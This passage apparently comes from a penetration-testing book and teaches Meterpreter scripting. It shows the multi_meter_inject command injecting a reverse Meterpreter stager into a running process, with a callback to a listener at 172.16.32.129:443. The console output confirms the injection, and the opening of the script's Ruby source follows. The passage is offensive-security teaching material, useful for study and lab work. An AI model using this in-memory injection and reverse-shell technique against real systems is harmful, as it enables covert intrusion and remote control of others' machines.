Meterpreter Scripting
237
We’ll inject our new Meterpreter shell into the
iexplorer.exe
process.
This will spawn a second Meterpreter console completely within memory and
will never write data to the disk.
Let’s run the
multi_meter_inject
command using some of the switches we
reviewed earlier to see if it works:
meterpreter >
run multi_meter_inject -mp 2808 -mr 172.16.32.129 -p 443
[*] Creating a reverse meterpreter stager: LHOST=172.16.32.129 LPORT=443
[*] Injecting meterpreter into process ID 2808
[*] Allocated memory at address 0x03180000, for 290 byte stager
[*] Writing the stager into memory...
[*] Sending stage (749056 bytes) to 172.16.32.170
[+] Successfully injected Meterpreter in to process: 2808
[*] Meterpreter session 3 opened (172.16.32.129:443 -> 172.16.32.170:1098) at
Tue Nov 30 22:37:29 -0500 2010
meterpreter >
As this output indicates, our command was successful and a new Meter-
preter session has been opened, as shown at .
Now that you understand what this script can do, let’s examine how it
works. We’ll break the script into chunks to help us parse its commands and
overall structure.
First, variables and definitions are defined and the flags we want to pass
to Meterpreter are set up:
# $Id: multi_meter_inject.rb 10901 2010-11-04 18:42:36Z darkoperator $
# $Revision: 10901 $
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
#-----------------------------------------------------------------------------
################## Variable Declarations ##################
@client = client
lhost = Rex::Socket.source_address("1.2.3.4")
lport = 4444
lhost = "127.0.0.1"
pid = nil
multi_ip = nil
multi_pid = []
payload_type = "windows/meterpreter/reverse_tcp"
start_handler = nil
@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help menu." ],
"-p" => [ true, "The port on the remote host where Metasploit is
listening (default: 4444)"],
"-m" => [ false, "Start Exploit multi/handler for return connection"],
"-pt" => [ true, "Specify Reverse Connection Meterpreter Payload.
Default windows/meterpreter/reverse_tcp"],
"-mr" => [ true, "Provide Multiple IP Addresses for Connections
separated by comma."],
"-mp" => [ true, "Provide Multiple PID for connections separated by
comma one per IP."]
)
meter_type = client.platform